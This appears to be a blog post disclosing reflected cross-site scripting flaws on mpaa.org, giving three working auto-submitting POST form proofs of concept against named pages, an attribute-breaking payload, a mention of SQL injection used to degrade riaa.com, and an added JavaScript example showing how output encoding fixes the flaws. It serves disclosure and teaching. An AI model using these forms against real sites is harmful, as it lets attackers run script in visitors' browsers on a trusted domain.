A few days ago I wrote an article about the RIAA's web pages, which contained dozens of XSS vulnerabilities. I certainly wasn't the only one; I am sure you received this information from other sources too. Others tried to DoS the site via SQL injection.
The MPAA (The Motion Picture Association of America) is an organization which represents film studios in the USA. The MPAA, like the RIAA and similar organizations (e.g. the IFPI), is very unpopular in the p2p community. It has recently come out that the numbers on which the MPAA based a lot of questionable lobbying, taken from statistics produced for the MPAA by another company, were not correct (more at Silicon Valley Insider (eng), or Pooh (cz)). But that is not the subject of this article.
After testing Riaa.com I decided to check Mpaa.org. I have seen the biggest companies with the worst security, so I went into this test without expectations. Riaa.com contained 40 vulnerabilities which allowed XSS, and half of them also allowed SQL injection. The RIAA reacted to this almost instantly (they had no other option, because users were bombarding the site with database benchmark queries and the site's usability degraded). The RIAA did not remove all the vulnerabilities, only those described in English-language media and blogs. That is why one vulnerability I discovered is still working. Mpaa.org is a big portal, bigger than Riaa.com. I found "only" three vulnerabilities which allow an attacker to use XSS.
Mpaa.org only allows these vulnerabilities to be exploited by sending the data to the webserver with the POST method. That means we cannot put the payload in a URL; we need a page that submits the form for us. This is not much of an obstacle for an attacker: the form sits on a page the attacker hosts, a short script submits it as soon as the victim's browser loads that page, and the victim's browser then sends the POST to mpaa.org and renders the reflected script in the mpaa.org origin. I have created three POC examples, which at this very moment are fully working. In each one the value of the hidden field is reflected into the response unencoded; the payload in Example 2 starts with >"> so that it first closes a quoted attribute value and its tag before the script tag, which is why it differs from the payload in Example 1.
Example 1 (field txtfavoritemovie on thank_you.asp, reflected into the page body):
<!-- Auto-submitting POST form: the victim's browser sends the request to mpaa.org -->
<form method="POST" action="http://www.mpaa.org/thank_you.asp" name="explForm">
<!-- Payload is reflected unencoded into the HTML body -->
<input type="hidden" name="txtfavoritemovie" value='<script>alert("xss")</script>'>
</form>
<script>
// Submit the form as soon as the page has loaded it
setTimeout(function () { document.explForm.submit(); }, 1);
</script>
Example 2 (field name on thank_you.asp, reflected into an attribute value):
<form method="POST" action="http://www.mpaa.org/thank_you.asp" name="explForm">
<!-- Leading >"> closes the quoted attribute and its tag before the script tag -->
<input type="hidden" name="name" value='>"><script>alert ("xss")</script>'>
</form>
<script>
setTimeout(function () { document.explForm.submit(); }, 1);
</script>
Example 3 (field txtsearch on flmrat_srchreslts.asp, the film-rating search):
<form method="POST" action="http://www.mpaa.org/flmrat_srchreslts.asp" name="explForm">
<!-- Search term is reflected unencoded into the results page -->
<input type="hidden" name="txtsearch" value='<script>alert ("xss")</script>'>
</form>
<script>
setTimeout(function () { document.explForm.submit(); }, 1);
</script>
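To show why these three reflections are exploitable and what the fix looks like, here is an added example that is not code from mpaa.org or from this article. The shape of thank_you.asp is an assumption (the real page is not available); it only models the two reflection contexts the POCs above target, the HTML body (Example 1) and a double-quoted attribute value (Example 2), and contrasts the unencoded output with output passed through a context-aware HTML encoder. The payloads are the ones from the POC forms; the renderer and check functions are constructed for this illustration.

```javascript
// Added example, not from mpaa.org. Models a page that reflects POSTed
// fields, first without encoding (how the POCs above work), then with
// HTML encoding at every reflection point.

// Encode the five characters that can break out of HTML text or out of a
// quoted attribute value. Encoding both quote styles covers single- and
// double-quoted attributes alike.
function htmlEncode(value) {
  const map = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;"
  };
  return String(value).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// ASSUMED shape of the vulnerable page: "name" is echoed both into the
// body and into a double-quoted attribute, "txtfavoritemovie" into the body.
function renderThankYouVulnerable(fields) {
  return (
    '<p>Thank you, ' + fields.name + '!</p>\n' +
    '<input type="text" name="name" value="' + fields.name + '">\n' +
    '<p>Your favorite movie: ' + fields.txtfavoritemovie + '</p>\n'
  );
}

// Same page with output encoding applied wherever user data is reflected.
function renderThankYouSafe(fields) {
  return (
    '<p>Thank you, ' + htmlEncode(fields.name) + '!</p>\n' +
    '<input type="text" name="name" value="' + htmlEncode(fields.name) + '">\n' +
    '<p>Your favorite movie: ' + htmlEncode(fields.txtfavoritemovie) + '</p>\n'
  );
}

// Crude check (constructed for this example, not a real HTML parser):
// does the rendered markup contain a script tag the browser would execute?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Payloads taken from the POC forms above. Example 2's leading >"> is
// what closes value="..." and the <input> tag before its script tag.
const PAYLOADS = {
  txtfavoritemovie: '<script>alert("xss")</script>',
  name: '>"><script>alert ("xss")</script>'
};

// Run both renderers on the payloads so the block shows the difference
// when executed directly.
function demo() {
  return {
    vulnerableExecutes: containsScriptTag(renderThankYouVulnerable(PAYLOADS)),
    safeExecutes: containsScriptTag(renderThankYouSafe(PAYLOADS))
  };
}

console.log(renderThankYouVulnerable(PAYLOADS));
console.log(renderThankYouSafe(PAYLOADS));
console.log(demo());
```

The unencoded render contains a live script tag for both payloads; the encoded render contains only &lt;script&gt; text, and the &gt;&quot;&gt; prefix from Example 2 stays inside the attribute value instead of closing it. Encoding at output time, in the context the value is written into, is the fix; rejecting the GET method, as mpaa.org does, changes nothing about exploitability.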
As I mentioned above, the RIAA hasn't removed all the vulnerabilities, so I am attaching a POC for Riaa.com. You can try that here.
0 Responses to “Security vulnerabilities at Mpaa.org”